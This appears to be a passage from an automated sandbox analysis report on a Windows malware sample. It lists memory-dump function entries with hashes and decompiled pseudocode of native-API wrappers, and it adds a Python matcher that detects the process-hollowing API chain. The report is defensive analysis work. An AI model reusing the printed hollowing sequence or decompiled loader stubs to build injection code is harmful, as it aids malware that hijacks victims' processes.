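The six API call sites above in the 0x2F0000 region of process 4 (CreateProcessA, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread) are the complete suspended-process hollowing chain: create the victim suspended, read its PEB for the image base, allocate and write the payload image into it, point the main thread's context at the new entry point, and resume. The matcher below is an added example, not code from this report or from Joe Sandbox; it checks an observed API trace for that chain as an ordered subsequence, tolerating unrelated calls in between and accepting the Nt*/Wow64 aliases. Note that the `ref:` values above are call-site addresses, not execution order, so the trace in the example is constructed in the canonical order rather than taken from the report.

```python
"""Order-aware matcher for the process-hollowing API chain (added example)."""
from typing import Dict, List, Sequence, Tuple

# (stage name, accepted API names, optional?) in the order a hollowing loader
# must perform them. Optional stages appear in some loaders but not all; the
# sample above, for instance, shows no NtUnmapViewOfSection call site.
HOLLOWING_STAGES: List[Tuple[str, Tuple[str, ...], bool]] = [
    ("create suspended target", ("CreateProcessA", "CreateProcessW", "CreateProcessInternalW"), False),
    ("read target image base", ("ReadProcessMemory", "NtReadVirtualMemory"), True),
    ("unmap original image", ("NtUnmapViewOfSection", "ZwUnmapViewOfSection"), True),
    ("allocate in target", ("VirtualAllocEx", "NtAllocateVirtualMemory"), False),
    ("write payload", ("WriteProcessMemory", "NtWriteVirtualMemory"), False),
    ("redirect entry point", ("SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"), False),
    ("resume", ("ResumeThread", "NtResumeThread"), False),
]

# Constructed trace using the report's own "Api.MODULE" spelling; the order is
# the canonical one and is an assumption, since the report lists call sites only.
OBSERVED_CALLS = [
    "GetModuleHandleA.KERNEL32",
    "CreateProcessA.KERNEL32",
    "GetThreadContext.KERNEL32",
    "ReadProcessMemory.KERNELBASE",
    "VirtualAllocEx.KERNELBASE",
    "WriteProcessMemory.KERNELBASE",
    "WriteProcessMemory.KERNELBASE",
    "Wow64SetThreadContext.KERNEL32",
    "ResumeThread.KERNELBASE",
]


def api_name(call: str) -> str:
    """Strip a trailing '.MODULE' suffix such as 'VirtualAllocEx.KERNELBASE'."""
    return call.split(".", 1)[0]


def match_hollowing(calls: Sequence[str]) -> Dict[str, object]:
    """Consume the stages in order while walking the trace once.

    A call may satisfy the next pending stage, or a later stage as long as every
    stage skipped over is optional. Calls that match nothing are ignored, so a
    noisy trace still matches; calls in the wrong order do not.
    """
    seen: Dict[str, str] = {}
    next_stage = 0
    for call in calls:
        api = api_name(call)
        for idx in range(next_stage, len(HOLLOWING_STAGES)):
            name, aliases, optional = HOLLOWING_STAGES[idx]
            if api in aliases:
                seen[name] = api
                next_stage = idx + 1
                break
            if not optional:
                break  # a required stage is still pending; cannot jump past it
    missing = [name for name, _, optional in HOLLOWING_STAGES
               if not optional and name not in seen]
    return {"stages": seen, "missing": missing, "hollowing": not missing}


if __name__ == "__main__":
    verdict = match_hollowing(OBSERVED_CALLS)
    print("hollowing:", verdict["hollowing"])
    for stage, api in verdict["stages"].items():
        print(f"  {stage:<26} {api}")
```

The same matcher rejects a plain launcher (CreateProcess followed by WaitForSingleObject) and a trace in which ResumeThread precedes the writes, which is the distinction a rule keyed on individual API names cannot make.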

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: fb8fd834593483cdb9cc01cda5767a4bdf8b61fa1e2a5acd50d705e15a2b4fcb
                                      • Instruction ID: 38874879b7f26533e1f368be6af7d6e0715deb4319fe96249119bfdee165f3e3
                                      • Opcode Fuzzy Hash: fb8fd834593483cdb9cc01cda5767a4bdf8b61fa1e2a5acd50d705e15a2b4fcb
                                      • Instruction Fuzzy Hash: AC41B27495162ECFEB34DFA5C948BECB7B1AB48305F1086EAC409AB2A4D7745AC4DF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: bf4fcb526e16e7384d808bbc66c02718da476e30cfc19739b08dbd7a5c18ddf5
                                      • Instruction ID: 888f4830b4b765257d1c15ab47f945070a5126955dd780192b3c62b6b515ee06
                                      • Opcode Fuzzy Hash: bf4fcb526e16e7384d808bbc66c02718da476e30cfc19739b08dbd7a5c18ddf5
                                      • Instruction Fuzzy Hash: B331D270D5422ACBEB24DFA5D948BEDB7B1BB09304F1081EAD009A7284D7759AC5DF11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: 8739b3bcfe29bf4b2c9e60ba4cee18799985faae837be57cd369976faa77f344
                                      • Instruction ID: d65a191673ff87af1ccf80d9e927764f0ad50853694d346d265694b140108f4d
                                      • Opcode Fuzzy Hash: 8739b3bcfe29bf4b2c9e60ba4cee18799985faae837be57cd369976faa77f344
                                      • Instruction Fuzzy Hash: 8921D27095522ACFEB21DF94C948BE9B7B0FB09304F2092EAD409AB294D7754AC5CF11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: e79ccf06fa033d5bf4f5271e931d9831e672297b13ebad31f3dc85633f690f00
                                      • Instruction ID: e4f394e91fe94f2af31765d8ef04bc5493bd36b97637a5336445d3f393a91730
                                      • Opcode Fuzzy Hash: e79ccf06fa033d5bf4f5271e931d9831e672297b13ebad31f3dc85633f690f00
                                      • Instruction Fuzzy Hash: C021DE70C5522ACBEB34DFA4C949BECBBB0AB49300F1086EAD409A7294E7705EC0CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472482699.000000000023D000.00000040.00000001.sdmp, Offset: 0023D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 558dda5f5e9b8b9ff68b62a59a411da3682543e1934e4f9254992469b2959f57
                                      • Instruction ID: 99a57fca8a09b9ffa1b27f1d211a4eeff68cbbfa366c01de98cc6d79eceba9b2
                                      • Opcode Fuzzy Hash: 558dda5f5e9b8b9ff68b62a59a411da3682543e1934e4f9254992469b2959f57
                                      • Instruction Fuzzy Hash: EB2134B4618244DFCB18DF24E8C4B2ABB61FB88B14F34C569E9094B246C777D827CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472482699.000000000023D000.00000040.00000001.sdmp, Offset: 0023D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 49f9e2ae041f7111d9af052405c55f1419efa1c1ad1922df7cfd26addc7cb6c7
                                      • Instruction ID: f84643121821ffd87b9231f542fadfa64e1e6ec4dcf800f1c71adbab8fa8cc1b
                                      • Opcode Fuzzy Hash: 49f9e2ae041f7111d9af052405c55f1419efa1c1ad1922df7cfd26addc7cb6c7
                                      • Instruction Fuzzy Hash: C7217FB54083809FCB06CF24D994B11BFB1EB46714F28C5DAD8458B266C33AD81ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472471565.000000000022D000.00000040.00000001.sdmp, Offset: 0022D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 66dca0dfbbe6f2132ba696d3406e692937a18a9116e7ebbfbbc9a5fea4302474
                                      • Instruction ID: 8a46b799e8475a721352f4dcb4f45baa9c5119086001f1f60c7019843b99495d
                                      • Opcode Fuzzy Hash: 66dca0dfbbe6f2132ba696d3406e692937a18a9116e7ebbfbbc9a5fea4302474
                                      • Instruction Fuzzy Hash: 2601F731018764FADB508E55EC84B6BBB98DF51724F18C11AED085B183D3B4DC01C6B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472471565.000000000022D000.00000040.00000001.sdmp, Offset: 0022D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 71f145d490e02d799e43773a6bc22275c08185a248433836dee5d0b3fbfd4bb3
                                      • Instruction ID: bd46d3770ba26f1bb298beac2dd06e722f4a50747877b4b5d26c873dae9398a4
                                      • Opcode Fuzzy Hash: 71f145d490e02d799e43773a6bc22275c08185a248433836dee5d0b3fbfd4bb3
                                      • Instruction Fuzzy Hash: E4F0AF31004658ABEB508E45D888B62FF98EF51724F18C55AED081A283C278DC40CAB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b2be1ee90e5890930e65d7e05ce1e433e4f08f549b5f5496f5c3a2da885e308
                                      • Instruction ID: 78bf291943bce4bf931350a28cee1f49e6e3997d3c5da49a6f1924ba128fbf2e
                                      • Opcode Fuzzy Hash: 3b2be1ee90e5890930e65d7e05ce1e433e4f08f549b5f5496f5c3a2da885e308
                                      • Instruction Fuzzy Hash: FF01C471E10228CFDB24DFA5C981BEEBBB5AB49304F1444999109AB291C734AF84CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b741f8613f5efa07e17843d853995fb276e1aeeb44ee01a6ec8cdace8603e596
                                      • Instruction ID: 4237d28361b978935298eda27723fe2c0e7f5f0299c0bba441c1c3075d60d10d
                                      • Opcode Fuzzy Hash: b741f8613f5efa07e17843d853995fb276e1aeeb44ee01a6ec8cdace8603e596
                                      • Instruction Fuzzy Hash: 2BF09235904208FBCB05DFD8D941AADBBB5EB48314F20C199A91966362C772AA61EF81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8135a56587c3c9368b20ed9ea19a41c362ccc50159ba2a123580df33015e1421
                                      • Instruction ID: d5ed5b36bb35689a4a3a26f7576aa549c029f694cd462ae3bb105ef9e87369e9
                                      • Opcode Fuzzy Hash: 8135a56587c3c9368b20ed9ea19a41c362ccc50159ba2a123580df33015e1421
                                      • Instruction Fuzzy Hash: 8CE0E538904208EBCB04DFA9D4456ADFBB4AB89304F20C1AED848A3356D671AA51DF81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1b60a6d78f5e7546db4453c91bc526b4c6d930a548b7949539c1143c3a297c9
                                      • Instruction ID: 98ceada1eedb2a071388553513eff04963400b0cf8022836e638bf9777df157e
                                      • Opcode Fuzzy Hash: e1b60a6d78f5e7546db4453c91bc526b4c6d930a548b7949539c1143c3a297c9
                                      • Instruction Fuzzy Hash: 79E09A34E04108EBD704DFD8D9556ACFBB4EB89304F20C1AD9909A7356DB71AA55CF81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: UUUU$b<H($j\z
                                      • API String ID: 0-364476664
                                      • Opcode ID: b895dd7824a59b5ee50e2e89ec418ec92274c999b29280bae8e0ba41466b2023
                                      • Instruction ID: 424e8fd0b3f27d0a2c2128b362ca66237deaa2ee3717653ebc4d0396a189658a
                                      • Opcode Fuzzy Hash: b895dd7824a59b5ee50e2e89ec418ec92274c999b29280bae8e0ba41466b2023
                                      • Instruction Fuzzy Hash: 29518070E146288FDBA4CFADC880B8DFBF2AF49340F1481A9D168E7206D7349A85CF11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: $]H$dWH
                                      • API String ID: 0-2474546164
                                      • Opcode ID: e300f6533cf1f6231af0fac4ea4b1aa311ce1cb120c8f2945a2a1ffdb5e11b68
                                      • Instruction ID: c65324824b44cc8e39dfe9baf152bf395d24fda8571f99cfd137fd07ed5aa7f7
                                      • Opcode Fuzzy Hash: e300f6533cf1f6231af0fac4ea4b1aa311ce1cb120c8f2945a2a1ffdb5e11b68
                                      • Instruction Fuzzy Hash: 1F619070D11258DFDB44EFB9E885AAD7BF2AB89304F11C539D104AF369DB74990A8F80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: $]H$dWH
                                      • API String ID: 0-2474546164
                                      • Opcode ID: a4dfb0b6d64e9ff32ed1fbd26ad9a399574b5d03a1cb73062b8d6fea7d1d3a19
                                      • Instruction ID: a027fcd8a23b756be2098c01de317b4f6f4f8745f7f7c3751342a04927e93b3f
                                      • Opcode Fuzzy Hash: a4dfb0b6d64e9ff32ed1fbd26ad9a399574b5d03a1cb73062b8d6fea7d1d3a19
                                      • Instruction Fuzzy Hash: DD516F70911218DFD744EFB9E885AAD7BF3AB89304F11C539D104AF368DB74990A8F90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: T\)
                                      • API String ID: 0-3225998666
                                      • Opcode ID: 072aee323c4abbc798480265c084c1e556318f659266a11215c4d1f77ad4667e
                                      • Instruction ID: 3ce3ebebac5aff77da956cce9d1f35af875d593fac08c15b33ce34700cdcec87
                                      • Opcode Fuzzy Hash: 072aee323c4abbc798480265c084c1e556318f659266a11215c4d1f77ad4667e
                                      • Instruction Fuzzy Hash: E3C1243192924ACBC7109F79C8902BAFBF1EF41340F6484BBE656DB292D3B49971C752
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: e
                                      • API String ID: 0-4024072794
                                      • Opcode ID: a8fbb3490bfd5c20468e059314cc08ec247ac4c196d62e498b752971da4063ca
                                      • Instruction ID: 9848a0f67d9c88035daa6603d95d712bb464a95f4cb3c08047b7ba96d1d2a892
                                      • Opcode Fuzzy Hash: a8fbb3490bfd5c20468e059314cc08ec247ac4c196d62e498b752971da4063ca
                                      • Instruction Fuzzy Hash: 8C4150B1E016588BEB1CCF6B8D4079AFAF3AFC9300F14C1BA850DA6215EB7019858F15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472375681.0000000000082000.00000020.00020000.sdmp, Offset: 00080000, based on PE: true
                                      • Associated: 00000004.00000002.472371422.0000000000080000.00000002.00020000.sdmp
                                      • Associated: 00000004.00000002.472446674.0000000000132000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                      • Instruction ID: bd643360dd9d88dbfcd95590402147e20ff9165330c55df9eb09a8da1e0d777a
                                      • Opcode Fuzzy Hash: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                      • Instruction Fuzzy Hash: 8E62696144F7C19FD7534B746DB46E2BFB1AE6321871E44CBC4C0CE4A3E22A195AE722
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      APIs
                                      • NtQueryInformationProcess.NTDLL ref: 0036A19F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506274957.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID: 0
                                      • API String ID: 1778838933-4108050209
                                      • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                      • Instruction ID: db7438bc47bfb15f3901b093ed957552e1a7920b63d43e83b6334906ff288329
                                      • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                      • Instruction Fuzzy Hash: 63F14370918A4C8FDBA6EF68C894AEEB7E0FF98304F40462AE54EDB255DF349541CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A465
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1JA$rMA$rMA
                                      • API String ID: 2738559852-782607585
                                      • Opcode ID: 9914dd337f64a7b31bf72df675d152d5713e268940301750ca92dcfaa6f04c6d
                                      • Instruction ID: 7c38d89ab93df81105f2114b4883131f6cf40875b4705179c94253e06e298a16
                                      • Opcode Fuzzy Hash: 9914dd337f64a7b31bf72df675d152d5713e268940301750ca92dcfaa6f04c6d
                                      • Instruction Fuzzy Hash: D9F0E2B6204109ABCB08DF99CC80EEB77AAAF8C754F058259BE0D97251D634E8518BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E0041A420(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                      				void* _t18;
                                      				void* _t27;
                                      				intOrPtr* _t28;
                                      
                                      				_t13 = _a4;
                                      				_t28 = _a4 + 0xc48;
                                      				E0041AF70(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                      				_t4 =  &_a40; // 0x414a31
                                      				_t6 =  &_a32; // 0x414d72
                                      				_t12 =  &_a8; // 0x414d72
                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                      				return _t18;
                                      			}

                                      APIs
                                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A465
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1JA$rMA$rMA
                                      • API String ID: 2738559852-782607585
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: 853ae5a9cbf7dd52acbc9bf2bbd942333817209f7ae892279ddd8fb5cf099807
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: EBF0A4B6200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97251D630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtQueryInformationProcess.NTDLL ref: 0036A19F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506274957.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID: 0
                                      • API String ID: 1778838933-4108050209
                                      • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                      • Instruction ID: 554ca5438b3b4d5663259802956e58d960a9efcde48863f309140353af1fdd9a
                                      • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                      • Instruction Fuzzy Hash: 4F515D70918A8C8FDBA9EF68C8946EEBBF0FB98305F40462ED44AD7215DF309645CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 16%
                                      			E0041A36B(void* __eax, void* __ecx, void* __edi, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {
                                      				void* _v0;
                                      
                                      				asm("aad 0x62");
                                      				_push(ds);
                                      				if (__eflags < 0) goto L3;
                                      			}

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3BD
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 25e10beb385e0c8ad6e5b093bc203bfc984318efcd2ba0e606d3956a370f58f9
                                      • Instruction ID: f13a7f2ed15b10cc941d6ce38a6d9b22506d6a01a518b2f66292f6644dc746c6
                                      • Opcode Fuzzy Hash: 25e10beb385e0c8ad6e5b093bc203bfc984318efcd2ba0e606d3956a370f58f9
                                      • Instruction Fuzzy Hash: 2B21F5B6201208AFCB08CF99DC91EEB77A9EF8C754F15864DFA0D97251C630E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040ACF0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
                                      				char* _v8;
                                      				struct _EXCEPTION_RECORD _v12;
                                      				struct _OBJDIR_INFORMATION _v16;
                                      				char _v536;
                                      				void* _t15;
                                      				struct _OBJDIR_INFORMATION _t17;
                                      				struct _OBJDIR_INFORMATION _t18;
                                      				void* _t31;
                                      				void* _t32;
                                      				void* _t33;
                                      
                                      				_v8 =  &_v536;
                                      				_t15 = E0041CC60( &_v12, 0x104, _a8);
                                      				_t32 = _t31 + 0xc;
                                      				if(_t15 != 0) {
                                      					_t17 = E0041D080(__eflags, _v8);
                                      					_t33 = _t32 + 4;
                                      					__eflags = _t17;
                                      					if(_t17 != 0) {
                                      						E0041D300(__ebx,  &_v12, 0);
                                      						_t33 = _t33 + 8;
                                      					}
                                      					_t18 = E0041B4B0(_v8);
                                      					_v16 = _t18;
                                      					__eflags = _t18;
                                      					if(_t18 == 0) {
                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                      						return _v16;
                                      					}
                                      					return _t18;
                                      				} else {
                                      					return _t15;
                                      				}
                                      			}

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                      • Instruction ID: 36d4d6e408e5d2a0d8ad193a5268f308b8346a18828ed8d7c7f2542abd93b906
                                      • Opcode Fuzzy Hash: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                      • Instruction Fuzzy Hash: 3C015EB5D4020DABDB10DBA1DC42FDEB3789F54308F0041AAE908A7281F634EB548B96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3BD
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: db220115459d8e284863bd9c0c46ad68448eb9d788840dc0e4734df984f4989a
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: C3F0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A550(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                      				long _t14;
                                      				void* _t21;
                                      
                                      				_t3 = _a4 + 0xc60; // 0xca0
                                      				E0041AF70(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                      				return _t14;
                                      			}

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B144,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A589
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 0e5d983f4d7433d3b56fd13b6aea7c1fda5e5f7f579047cba8cb0cdbad6970d5
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: 0BF015B6200208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A49C(void* __ebx, intOrPtr _a4, void* _a8) {
                                      				long _t8;
                                      				void* _t14;
                                      
                                      				_t5 = _a4;
                                      				_t2 = _t5 + 0x10; // 0x300
                                      				_t3 = _t5 + 0xc50; // 0x40a943
                                      				E0041AF70(_t14, _a4, _t3,  *_t2, 0, 0x2c);
                                      				_t8 = NtClose(_a8); // executed
                                      				return _t8;
                                      			}

                                      APIs
                                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4C5
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 82c9e34627f874fd3dd691114cc3f3b91c25aa1652a2ef5529dfa40dcd535547
                                      • Instruction ID: c99708772b72af2c740a6cca067ca1af721bba4fa0a4489927470d6a4dfe5291
                                      • Opcode Fuzzy Hash: 82c9e34627f874fd3dd691114cc3f3b91c25aa1652a2ef5529dfa40dcd535547
                                      • Instruction Fuzzy Hash: DBE0C2752402046BD710DBD9CC85EE77BA9EF48364F104159BA1CDB281C530EA008690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A4A0(intOrPtr _a4, void* _a8) {
                                      				long _t8;
                                      				void* _t11;
                                      
                                      				_t5 = _a4;
                                      				_t2 = _t5 + 0x10; // 0x300
                                      				_t3 = _t5 + 0xc50; // 0x40a943
                                      				E0041AF70(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                      				_t8 = NtClose(_a8); // executed
                                      				return _t8;
                                      			}

                                      APIs
                                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4C5
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: c33b16737f5c434921732b7844560f19735d13db32535ac4bb7687e6ea559cfd
